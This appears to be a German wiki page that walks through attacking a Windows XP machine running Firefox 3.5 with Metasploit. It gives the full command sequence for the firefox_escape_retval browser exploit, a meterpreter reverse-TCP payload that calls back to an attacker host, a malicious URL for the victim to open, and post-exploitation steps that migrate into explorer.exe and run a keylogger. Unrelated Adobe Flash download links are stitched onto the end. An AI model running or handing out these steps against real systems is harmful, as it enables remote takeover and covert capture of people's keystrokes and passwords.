Links

Setup Opfer

Winxp Service pack 3 Firefox 3.5

Setup Hacker

Kali Linux ip: 192.168.242.53

vorgehen

starte metasploit

msfconsole

use exploit/multi/browser/firefox_escape_retval
set payload windows/meterpreter/reverse_tcp/
set lhost 192.168.242.53 (lokaler Host)
set svrhost 192.168.242.53 (HTTP-Server IP)
set svrport 8888 (HTTP-Server Port)
set lport 4444 (lokaler Port)
set uripath /hack (optional)
exploit

jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack
wenn wir meterpreter > sehen hat der exploit funktioniert

session - i 1 (in die session gehen)
sessions -h (zeigt optionen)
ps (zeigt prozesse)
migrate PSID (verschiebt in den prozess Z.b explorer.exe)
getpid (zeigt momentanen prozess)
keyscan_start (startet den keyloger)
keyscan_dump (zeigt aufzeichnungen)
keyscan_stop (stopt keyloger)

Download Adobe Flash Player 18.0.0.203 (for Internet Explorer) http://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ax.exe

Download Adobe Flash Player 18.0.0.203 (for Firefox and other browsers NPAPI ) http://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player.exe

Download Adobe Flash Player 18.0.0.203 (forChromium /Opera PPAPI) http://fpdownload.macromedia.com/pub/flashplayer/latest/help/install_flash_player_ppapi.exe

View: Adobe Flash Player Website | Release Notes

Click here to check your version and Here to Download and here is an Alternate Download make sure you uncheck any unwanted add-ons and download both the one for IE and the other for other Browsers such as Firefox, Safari, Opera plugins!

Metasploit

Inhaltsverzeichnis

Links

Setup Opfer

Setup Hacker

vorgehen

Navigationsmenü

Suche